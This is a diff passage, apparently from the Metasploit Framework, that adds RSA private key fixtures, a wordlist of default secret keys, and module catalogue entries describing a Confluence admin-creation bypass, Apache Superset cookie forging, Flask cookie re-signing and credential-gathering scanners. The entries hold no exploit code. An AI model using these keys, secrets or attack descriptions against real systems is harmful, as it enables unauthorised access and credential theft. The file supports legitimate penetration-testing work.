+et+Gtv8/rE5rJkz2EU2PyVjuGtKN1ZEMnDOlM+nbPDWnP+1ieYVmB2HY9Kv3y+CQ
+tYaZuBC6EfJifgIxQJYEB2Ma+vthKhiHpJEe5FzNB1MLM5VXJlKQxeI1AoGBAM9f
+OAzUUA5IACoC9jl3aqj8pqqgdkqq3QcgWLnbQ9rXWjvqcWIP4n+eE9vL4lEKz86C
+KB7WEJUb4UBInDGudW5zDYgkB4kJRJEpeOZPsCc3AMncK01FonRZ7AaY27Iy2Jv7
+8iBwSiadSN86q05TL4hqYwFGtUE7bN9m0SWb9rBhAoGBAKwW3HRh9t1IKBUlU5K9
+a4COzqDHTM6iqppOS19usJ0nq9ofJv1zTNdFw+tDGcI5D55BmlNP+hG3Tc6lC5Ub
+Zay0ToVJFYM37qwdou7QwbjlTDkQgVUvfN1dK3N64gkjPydaa+97zdLB5mfM2NyM
+FCd4CtnRUmvKIFcTqcPUs+ZAoGAPoi1S1EfDx9xRTn9bFjxhiIiVGPtKBkcbBC6
+ENnpPW4hnN3W8T5fDCLsVCTIi63Z+qlPVfUxrPVqWMtMpsK4UOVLGFndF9r+nVPH
+TJSNR1YT28uUF0o/chzHyzl/Tt58aZVxb4zNH5Xgqshzbjwxok6KqpDbCd/Utg24
+VkIRAyECgYEAwgnMIysZVk329LhPzjMQgDSThQnautMJ0SjafSYWn2ASlWOn1XWk
+p3POBuQHSHLkMf7aDfka3rPRhn1yTTFgd5oHjTLexU+xMGhXkbVy3alUGAcZE8lH
+FkyKZUYTisGZn3qrMKNim/+o5DGXn02RbOS5iNiX4wxNVJ+DtEk9Q6I=
+-----END RSA PRIVATE KEY-----
@@ -0,0 +1,27 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIEpAIBAAKCAQEA0h41gxtVvp/p62gUE+KrgD+8kOEDM75UDaDqZDw8VmNnjKDx
+VSR01+7732O4bwCY8iPRe+0TAYRS+vv6HH/QYwxl9OYhAUXZijjn5pVGojEWCTaD
+z/GV+/U7QhjgfPS2qW46tuQOXQSRShDDkCDEHR8mspOSQSyGbSmpPYXOt8eXssvC
+yd4XM8eJhaoZzZAg8kFhFiy/l5J2yAeCFePMEbNxVPon0rf6BnXucGycoJtZWAAR
+HKnBW1shHIT+DNDMo9HUU7s1qVY8IRET6LqbDtgRgFS1PDD73KFlgozoquuwVZuK
+F6Uuwl6KU8f5Lgp7jvPWaqguTxvFyiVKZlhdgwIDAQABAoIBAQCceGqZK636utNT
+vrnU5SOZ6dzedvIPgljNnVtvMXwtSPE/xEpzgSaR9yISBQy/fM5o40uI4c8ZfhTd
+Wu+ycWwZlo4GhalmbUHGsQHgsKFc/vjN+47FN77dVo2+dxAVfZbZLYED2Wjo1BHt
+fXoSr5AgYYrzcFIT4P7nt6tNgvuxpXsMNAIN7uP7Hcdme7xb3DCxcti5x9sbljX
+GM3sI1MbqBnhkBpDxzQrBBMkpn37+8P9vYsCtBUzpI/XZvDJ3cIRbBG2Ph+tbeQm
+cANuj5YVeiKq3/p5EKdMbH7a/+x0+faIWHol8GqMW/GNL69tDMvO46kE9cqhf96d
+rtOA032BAoGBAPI8QriLzzflfP4GU7V+dO4vVtC7nzeks1Y8LGseDk81LGpJBpuG
+EqHzPhvNrJlmensefIRk7ItOFQVf8erZ2dkvHJQTo7zGX65avNfk2hh0NTfqa4a6
+rA+i+i2bymBjt1aGtELuZIZAFiMM5/1qq3dW9NzF6w+5I2V1NgvuUHmxAoGBAN4O
+vpsIc1sPDThLG6kiBk9OXpUXi2ZRLQa1xN1Tby8bn8cwqMT+OpanA2CzRnNiHFYL
+WH2sJBCZwmMDJJq3g82BA17/Z8fivrvUB4PNOW2TGjxyaqdgilAtYT9fpJgSodY9
+W3ZrsFI/kX6KMwbLuIVNCyqHLnc87lNLO7zdlqNzAoGAOMXm3VnnNzKSGPdipyb8
+QNbXghR3PJNddNilkHV65RWRU1fKNKk3tL1N0TZjPZDHJBQBGwaMahni01+pU2G7
+rStdh1cTCSt1QWgC2pbIhvK1hmVqzijyKrgH6qiYxf6Y+a6YkRdOeCiNB6n+tWZK
+ya2Xtias8QJzSVQvVpyEQAECgYEA2QQN8dP7cQWvxNFakhwHkKAlvY3KFc/FsmYY
+pLky0xYrO+9pMUTIm41TtsDeXEuJJ+pkrEV85aBvonZi4rXxIPkyAziXA3mtMEHS
+qlP6CQWXwXWMmFG4Ow1umhHt+RVUht1mMsCiDG/F0KZdogmdJuGZxRFiLvQkctD2
+6+ifnNMCgYAHGFS675HYCVgoa5E1FmK9Vc7C+PjHqARrKinmbODB0GBMnKDk7qww
+GeL0TlxQnJNabxwa1cUK9mW50pihAMlDOfwtxGuMhkyvH7sH400Iazb/y0rordHT
+A9a33jHpjIsviQD/R5oKXF2GEOUK1GTfhXYY6Nan/LTxxHiDFF/hIQ==
+-----END RSA PRIVATE KEY-----
@@ -0,0 +1,27 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIEowIBAAKCAQEAoUJXpD/5Wh7r4GIKD9UseSse3XTmMoS6IhsgmEkathmwdTww
+qzxA4vDcDufewZV5Jb6ekCe5+ImYCyu6SNJTm2w4LN9FRhyPHG6US+ZmCpfm6tVm
+uuada98jcbfLw1cZfai+2vqKGDX4+N6Tcs10tnQZ4seqln5Lb97NJ5pnWYhhz0DJ
+C93N4GpZIcj3rz2AKvxOCGWWqFV9yv5fUhzw9NPW65+NYkHtw/6dNOMA2+6w125D
+U4cax94nKfMVfXOlPY4gCxDNX2LmvQm6Dc9nXywqoK72M4yooKQ621n4U+o5WPcZ
+Mvg75rYJN/d+J0NrYtfTejwThYp6XBd9B41IUQIDAQABAoIBAGJjifmrFsaHqz8i
+UiVK2XGsf4567qDQHokEqCSCJgwJLIK7EK7JeoV8k6d8jYrrWhlPboth0bP0r5HR
+Qj2AJobjxnqKV0fp0N92EIEmuAeqmreZMK7EWjQg1w1hKK+sit8CgEA3MN6Iv7mI
+g8o91QIlYE3fqRNdR0WgWOfa60fSWBmblw/zy9trEN8SYVTV4IKxYGtZzxw3Ka4P
+w23d0Vq0lB4iYjiaLXWwlsDBerUM/SVDck6k5EDmxmTD5s3edm0CGsxesaxxG/8w
+mUU03IQ5rBuhdhhvrqnvQMrvWFXPRRFmFEpyQ0UxNSXZNIWAiw3CdFBHxGDI7PkR
+lwstaeECgYEA1sYMIkFauOYM6ff1MCFbWtz7YHv15zuaAvaRLQqZ+gn3wsgRTJTl
+CgYSdWCf74Sk3cUBdS6M4xqoEZAMzNIYV/HNj8F89m6+HE6r18cFhXzKQGq2FbgK
+p4CDe6p5Sv4gl9H8lqqH46/TVipxSrxr68bSrwdQyPGU+laEpbQ8PKUCgYEAwDaZ
+e4cUARkADJ6E8JJvHUxaQfbAG3S7v9aOP371teFO1wgF2D9OsGWSPVuQwYb5Zfaf
+aUu3UjV1CSU13dFDOkWXAGM6ZmgubF4TW95+yS1w7rJlZYjTbxE2Ew8fyEFrEHK9
+eREsouTEcLS/nSBqUut847EitHRmgE2ymHNWcT0CgYAFCyOPzl8WBnj5KZR9a9sc
+WCIjEuYkZvbn6Ohh2WTiRUenMFGPrdNvF9NpJDq9Qi0o9A5jtRMj5iVaPDrAuJJP
+xmLgZFfN5a3bNlG8wHS1vMd3Gcpq2iaN5muwBMHSbANR7WF0HE8Snrdkx5xfd+tE
+3ydlatOP1HR+KHf2+DON7QKBgQCwhnRWuitpBqjA7iRxPErHwYNy6UZs8Lws5sMl
+FVhbfVyGp1uWyi1eWyn/J8S9t1P8jI7CiUMHQQkHKSFbYgA32Alh1b+gpTVdWNi2
+mpQd9pms3jG5Gfv0GP5saotpwoqtRHM2aMtxnl+6koUXrNl45cSA6AFTcUNhufm3
+gNV2kQKBgBXOVa2ntVpqCng6pecJICknw6Dr6/H6YE01Ks7sXaHwD5bupkokxnFW
+JcVtJFNGUbLJHowG1rt6B1/w2IXpZZB2P4hQi+9033PxT+C+B13VaMkWTu+KbUhv
+Ji18eBNs+D3YHrR6sMyprth65c+GszaC/ZqyHxitP3UQhic41y+9
+-----END RSA PRIVATE KEY-----
@@ -0,0 +1,27 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIEpgIBAAKCAQEA99Bv5dUKWoLUuE2CRiri7LazYVFqH09vOZwBXPc61arFiZaI
+IrdqMxrkQ1AuBSfMVjSdOFYcgXF7FQmHe0YFCJrJFvc3xKbQQFFZHRiWfDggSNDq
+yt9T7xeb2suk3MI6jVT7Q/txnDZGSY9jDIwGDYygQ+VNBX+4A6A22XNZM4apdEx1
+Y5jiuty7wqoQeYZ9Syb5ge7EErClM+DmpIquqURHHtlAxidi3d9PKLSgWywkuXhQ
+kY9NxigdqX5p5fmeEdvCOoB0rimqpnQD6rOzkTyr7cEklyYeUtZH0nG53dZopAP4
+RYeCq1ckGzfVGKc1USE66zEUFhRJTc341/sbmQIDAQABAoIBAQDLawmvO2U4TtSW
+ROl+9402ifJNHCtkcCv4uhpUWYyt/3QPMMWm2bAPKy/cIWDlUnnk+WNk7yqPBrvl
+1OClTCCto4EVnPDmN5gSc7QWsiw04018+CEDTrbzOAnzW96EZ9rwUKXAdBIaDGM9
+1rmTfw0o6hpUIVFMBj7imwzrCkhahb3cRjOaPWn2HLQhVuExMx4XlcWHTlBAXQWB
+czeci/KY88loE96cn9YFP4ADF98L6vgi4WY3oXK7Jwv638IYUyksb4RTJirDXcuc
+yEZXMCzFkrzAhlZIX7ZgFULM9qgD17g9PaRmiYa3o7eUJ0d0Yq3Wnt2CnWDz+t9x
+wnAM5XABAoGBAP/oNgi5pNh+sSP/V/CjQ46+q81pBNMYauaTcFG14yY9oSgH2rtS
+j1Shvu9AHd4YskUiMs+6/6hNXkXwEClBwr5W5dxZixQYIu8tjVd3OoESvHg6VgUE
+1WTRuzX9rCQ/jCmE2+zr5JBnjzDBOKDvqicfrmGPLyC1iqIpYkxiBuKBAoGBAPfn
+eUXtAh/0wf7nOavqCYapn8pAwSu03YAzGZs74YlF0pVMCdCxrJAHTCYbOOM/hB0o
+8CVLZhT+ibzDBobhNxOB0IdlX0wY421vobIH5Thn2gQ2XRmtRztv9QFWG1nWQPno
+BcE1XawnXpPHL7TbQksxmPmsb2wb3FfXCO5htn0ZAoGBAN0klB0yICweP4H2FM6U
+p7rhNqIJkOvC/A5JdxSFc8gGFg/7yZ97FvVx2Qfzhlv5R4TKqtIsrOWKBl+1tqGQ
+fHPzsCudDbzNptK9sJjXJa2IvWnAL7mila3MOFXN40Zny/3NHCg/KYNImsrtDry0
+n3uzuwP/siA4AZdk39dWFtEBAoGBAKqvWkV1+QeNmuBpzcB7JFHuilFUImx4XCW/
+iTrjkNbWFzaqIvvoyTple92k0pdMjScSn73d2wxLcQRhdyX4/NXWhIAkoOehHz2j
+Jb6RRxZ+EpLh51odfzUCUbu40J4bMaOfSA8OMk+sz6aJ92PbrxpcrMoDGrhhumVU
+bhbLej1JAoGBAJzpodByDrSqmPSb8S5iRUiaJRTlg7BFIAo9+rmEqbl9pW4dFZQm
+kKNljx0zaJAqfqaPCi9WQLARXtYhBZbpUnhAsB89yjO4T0LFMhh2jAoJYZuOMnK9
+S8O/Gb4TUWDP6kGOmF9X2Wcc1FSyydmGHqR6OO3h1UdrhENNN3SSpshx
+-----END RSA PRIVATE KEY-----
@@ -0,0 +1,5 @@
+\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h
+CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
+thisISaSECRET_1234
+YOUR_OWN_RANDOM_GENERATED_SECRET_KEY
+TEST_NON_DEV_SECRET
@@ -1260,6 +1260,67 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_admin/http/atlassian_confluence_auth_bypass": {
+    "name": "Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control",
+    "fullname": "auxiliary/admin/http/atlassian_confluence_auth_bypass",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2023-10-04",
+    "type": "auxiliary",
+    "author": [
+      "Unknown",
+      "Emir Polat"
+    ],
+    "description": "This module exploits a broken access control vulnerability in Atlassian Confluence servers leading to an authentication bypass.\n          A specially crafted request can be create new admin account without authentication on the target Atlassian server.",
+    "references": [
+      "CVE-2023-22515",
+      "URL-https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html",
+      "URL-https://nvd.nist.gov/vuln/detail/CVE-2023-22515",
+      "URL-https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8090,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2023-10-19 17:11:03 +0000",
+    "path": "/modules/auxiliary/admin/http/atlassian_confluence_auth_bypass.rb",
+    "is_install_path": true,
+    "ref_name": "admin/http/atlassian_confluence_auth_bypass",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "config-changes"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_admin/http/axigen_file_access": {
    "name": "Axigen Arbitrary File Read and Delete",
    "fullname": "auxiliary/admin/http/axigen_file_access",
@@ -3094,7 +3155,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-10-03 19:50:04 +0000",
+    "mod_time": "2023-09-15 16:35:55 +0000",
    "path": "/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "admin/http/netgear_pnpx_getsharefolderlist_auth_bypass",
@@ -3111,6 +3172,9 @@
      "SideEffects": [
        "config-changes",
        "ioc-in-logs"
+      ],
+      "RelatedModules": [
+        "exploit/linux/telnet/netgear_telnetenable"
      ]
    },
    "session_types": false,
@@ -3158,7 +3222,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-02-03 18:12:53 +0000",
+    "mod_time": "2023-09-15 16:35:55 +0000",
    "path": "/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb",
    "is_install_path": true,
    "ref_name": "admin/http/netgear_r6700_pass_reset",
@@ -3174,6 +3238,9 @@
      ],
      "Reliability": [

+      ],
+      "RelatedModules": [
+        "exploit/linux/telnet/netgear_telnetenable"
      ]
    },
    "session_types": false,
@@ -5249,7 +5316,7 @@

    ],
    "targets": null,
-    "mod_time": "2023-08-14 10:42:32 +0000",
+    "mod_time": "2023-09-13 15:34:17 +0000",
    "path": "/modules/auxiliary/admin/kerberos/forge_ticket.rb",
    "is_install_path": true,
    "ref_name": "admin/kerberos/forge_ticket",
@@ -10301,7 +10368,7 @@
    "author": [
      "h00die"
    ],
-    "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n        acquired from various web applications.\n        Atlassian uses PBKDF2-HMAC-SHA1 which is 12001 in hashcat.\n        PHPass uses phpass which is 400 in hashcat.\n        Mediawiki is MD5 based and is 3711 in hashcat.",
+    "description": "This module uses John the Ripper or Hashcat to identify weak passwords that have been\n        acquired from various web applications.\n        Atlassian uses PBKDF2-HMAC-SHA1 which is 12001 in hashcat.\n        PHPass uses phpass which is 400 in hashcat.\n        Mediawiki is MD5 based and is 3711 in hashcat.\n        Apache Superset, some Flask and Werkzeug apps is pbkdf2-sha256 and is 10900 in hashcat",
    "references": [

    ],
@@ -10315,7 +10382,7 @@

    ],
    "targets": null,
-    "mod_time": "2021-01-27 13:50:39 +0000",
+    "mod_time": "2023-09-14 13:21:01 +0000",
    "path": "/modules/auxiliary/analyze/crack_webapps.rb",
    "is_install_path": true,
    "ref_name": "analyze/crack_webapps",
@@ -17510,6 +17577,73 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_gather/apache_superset_cookie_sig_priv_esc": {
+    "name": "Apache Superset Signed Cookie Priv Esc",
+    "fullname": "auxiliary/gather/apache_superset_cookie_sig_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2023-04-25",
+    "type": "auxiliary",
+    "author": [
+      "h00die",
+      "paradoxis",
+      "Spencer McIntyre",
+      "Naveen Sunkavally"
+    ],
+    "description": "Apache Superset versions <= 2.0.0 utilize Flask with a known default secret key which is used to sign HTTP cookies.\n          These cookies can therefore be forged. If a user is able to login to the site, they can decode the cookie, set their user_id to that\n          of an administrator, and re-sign the cookie. This valid cookie can then be used to login as the targeted user and retrieve database\n          credentials saved in Apache Superset.",
+    "references": [
+      "URL-https://github.com/Paradoxis/Flask-Unsign",
+      "URL-https://vulcan.io/blog/cve-2023-27524-in-apache-superset-what-you-need-to-know/",
+      "URL-https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/",
+      "URL-https://github.com/horizon3ai/CVE-2023-27524/blob/main/CVE-2023-27524.py",
+      "EDB-51447",
+      "CVE-2023-27524"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 8088,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2023-09-14 13:21:01 +0000",
+    "path": "/modules/auxiliary/gather/apache_superset_cookie_sig_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "gather/apache_superset_cookie_sig_priv_esc",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ],
+      "RelatedModules": [
+        "exploit/linux/http/apache_superset_cookie_sig_rce"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_gather/apple_safari_ftp_url_cookie_theft": {
    "name": "Apple OSX/iOS/Windows Safari Non-HTTPOnly Cookie Theft",
    "fullname": "auxiliary/gather/apple_safari_ftp_url_cookie_theft",
@@ -18763,6 +18897,63 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_gather/elasticsearch_enum": {
+    "name": "Elasticsearch Enumeration Utility",
+    "fullname": "auxiliary/gather/elasticsearch_enum",
+    "aliases": [
+      "auxiliary/scanner/elasticsearch/indices_enum"
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Silas Cutler <Silas.Cutler@BlackListThisDomain.com>",
+      "h00die"
+    ],
+    "description": "This module enumerates Elasticsearch instances. It uses the REST API\n          in order to gather information about the server, the cluster, nodes,\n          in the cluster, indicies, and pull data from those indicies.",
+    "references": [
+      "URL-https://www.elastic.co/guide/en/elasticsearch/reference/current/rest-apis.html"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 9200,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2023-08-24 17:24:20 +0000",
+    "path": "/modules/auxiliary/gather/elasticsearch_enum.rb",
+    "is_install_path": true,
+    "ref_name": "gather/elasticsearch_enum",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_gather/emc_cta_xxe": {
    "name": "EMC CTA v10.0 Unauthenticated XXE Arbitrary File Read",
    "fullname": "auxiliary/gather/emc_cta_xxe",
@@ -20560,7 +20751,7 @@

    ],
    "targets": null,
-    "mod_time": "2023-02-24 13:50:04 +0000",
+    "mod_time": "2023-08-14 16:14:36 +0000",
    "path": "/modules/auxiliary/gather/ldap_query.rb",
    "is_install_path": true,
    "ref_name": "gather/ldap_query",
@@ -21594,6 +21785,119 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_gather/prometheus_api_gather": {
+    "name": "Prometheus API Information Gather",
+    "fullname": "auxiliary/gather/prometheus_api_gather",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2016-07-01",
+    "type": "auxiliary",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module utilizes Prometheus' API calls to gather information about\n          the server's configuration, and targets. Fields which may contain\n          credentials, or credential file names are then pulled out and printed.\n\n          Targets may have a wealth of information, this module will print the following\n          values when found:\n          __meta_gce_metadata_ssh_keys, __meta_gce_metadata_startup_script,\n          __meta_gce_metadata_kube_env, kubernetes_sd_configs,\n          _meta_kubernetes_pod_annotation_kubectl_kubernetes_io_last_applied_configuration,\n          __meta_ec2_tag_CreatedBy, __meta_ec2_tag_OwnedBy\n\n          Shodan search: \"http.favicon.hash:-1399433489\"",
+    "references": [
+      "URL-https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 9090,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2023-08-15 18:04:59 +0000",
+    "path": "/modules/auxiliary/gather/prometheus_api_gather.rb",
+    "is_install_path": true,
+    "ref_name": "gather/prometheus_api_gather",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "auxiliary_gather/prometheus_node_exporter_gather": {
+    "name": "Prometheus Node Exporter And Windows Exporter Information Gather",
+    "fullname": "auxiliary/gather/prometheus_node_exporter_gather",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2013-04-18",
+    "type": "auxiliary",
+    "author": [
+      "h00die"
+    ],
+    "description": "This modules connects to a Prometheus Node Exporter or Windows Exporter service\n          and gathers information about the host.\n\n          Tested against Docker image 1.6.1, Linux 1.6.1, and Windows 0.23.1",
+    "references": [
+      "URL-https://github.com/prometheus/node_exporter",
+      "URL-https://sysdig.com/blog/exposed-prometheus-exploit-kubernetes-kubeconeu/"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 9100,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2023-08-15 15:55:23 +0000",
+    "path": "/modules/auxiliary/gather/prometheus_node_exporter_gather.rb",
+    "is_install_path": true,
+    "ref_name": "gather/prometheus_node_exporter_gather",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_gather/pulse_secure_file_disclosure": {
    "name": "Pulse Secure VPN Arbitrary File Disclosure",
    "fullname": "auxiliary/gather/pulse_secure_file_disclosure",
@@ -21636,7 +21940,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-01-14 00:34:06 +0000",
+    "mod_time": "2023-09-15 16:35:55 +0000",
    "path": "/modules/auxiliary/gather/pulse_secure_file_disclosure.rb",
    "is_install_path": true,
    "ref_name": "gather/pulse_secure_file_disclosure",
@@ -21649,6 +21953,9 @@
      ],
      "SideEffects": [
        "ioc-in-logs"
+      ],
+      "Reliability": [
+
      ],
      "RelatedModules": [
        "exploit/linux/http/pulse_secure_cmd_exec"
@@ -21657,6 +21964,64 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_gather/python_flask_cookie_signer": {
+    "name": "Python Flask Cookie Signer",
+    "fullname": "auxiliary/gather/python_flask_cookie_signer",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-01-26",
+    "type": "auxiliary",
+    "author": [
+      "h00die",
+      "paradoxis",
+      "Spencer McIntyre"
+    ],
+    "description": "This is a generic module which can manipulate Python Flask-based application cookies.\n          The Retrieve action will connect to a web server, grab the cookie, and decode it.\n          The Resign action will do the same as above, but after decoding it, it will replace\n          the contents with that in NEWCOOKIECONTENT, then sign the cookie with SECRET. This\n          cookie can then be used in a browser. This is a Ruby based implementation of some\n          of the features in the Python project Flask-Unsign.",
+    "references": [
+      "URL-https://github.com/Paradoxis/Flask-Unsign"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2023-09-12 15:52:58 +0000",
+    "path": "/modules/auxiliary/gather/python_flask_cookie_signer.rb",
+    "is_install_path": true,
+    "ref_name": "gather/python_flask_cookie_signer",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_gather/qnap_backtrace_admin_hash": {
    "name": "QNAP NAS/NVR Administrator Hash Disclosure",
    "fullname": "auxiliary/gather/qnap_backtrace_admin_hash",
@@ -21873,6 +22238,66 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_gather/roundcube_auth_file_read": {
+    "name": "Roundcube TimeZone Authenticated File Disclosure",
+    "fullname": "auxiliary/gather/roundcube_auth_file_read",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2017-11-09",
+    "type": "auxiliary",
+    "author": [
+      "joel <joel @ ndepthsecurity>",
+      "stonepresto",
+      "thomascube"
+    ],
+    "description": "Roundcube Webmail allows unauthorized access to arbitrary files on the host's filesystem, including configuration files.\n          This affects all versions from 1.1.0 through version 1.3.2. The attacker must be able to authenticate at the target system\n          with a valid username/password as the attack requires an active session.\n\n          Tested against version 1.3.2",
+    "references": [
+      "EDB-49510",
+      "URL-https://gist.github.com/thomascube/3ace32074e23fca0e6510e500bd914a1",
+      "CVE-2017-16651"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2023-08-25 08:59:53 +0000",
+    "path": "/modules/auxiliary/gather/roundcube_auth_file_read.rb",
+    "is_install_path": true,
+    "ref_name": "gather/roundcube_auth_file_read",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_gather/safari_file_url_navigation": {
    "name": "Mac OS X Safari file:// Redirection Sandbox Escape",
    "fullname": "auxiliary/gather/safari_file_url_navigation",
@@ -24614,53 +25039,6 @@
    "session_types": false,
    "needs_cleanup": false
  },
-  "auxiliary_scanner/elasticsearch/indices_enum": {
-    "name": "ElasticSearch Indices Enumeration Utility",
-    "fullname": "auxiliary/scanner/elasticsearch/indices_enum",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "Silas Cutler <Silas.Cutler@BlackListThisDomain.com>"
-    ],
-    "description": "This module enumerates ElasticSearch Indices. It uses the REST API\n        in order to make it.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": 9200,
-    "autofilter_ports": [
-      80,
-      8080,
-      443,
-      8000,
-      8888,
-      8880,
-      8008,
-      3000,
-      8443
-    ],
-    "autofilter_services": [
-      "http",
-      "https"
-    ],
-    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
-    "path": "/modules/auxiliary/scanner/elasticsearch/indices_enum.rb",
-    "is_install_path": true,
-    "ref_name": "scanner/elasticsearch/indices_enum",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "session_types": false,
-    "needs_cleanup": false
-  },
  "auxiliary_scanner/emc/alphastor_devicemanager": {
    "name": "EMC AlphaStor Device Manager Service",
    "fullname": "auxiliary/scanner/emc/alphastor_devicemanager",
@@ -25915,7 +26293,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-05-26 15:47:22 +0000",
+    "mod_time": "2023-08-17 15:29:20 +0000",
    "path": "/modules/auxiliary/scanner/http/apache_nifi_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/apache_nifi_version",
@@ -28946,6 +29324,66 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_scanner/http/elasticsearch_memory_disclosure": {
+    "name": "Elasticsearch Memory Disclosure",
+    "fullname": "auxiliary/scanner/http/elasticsearch_memory_disclosure",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2021-07-21",
+    "type": "auxiliary",
+    "author": [
+      "h00die",
+      "Eric Howard",
+      "R0NY"
+    ],
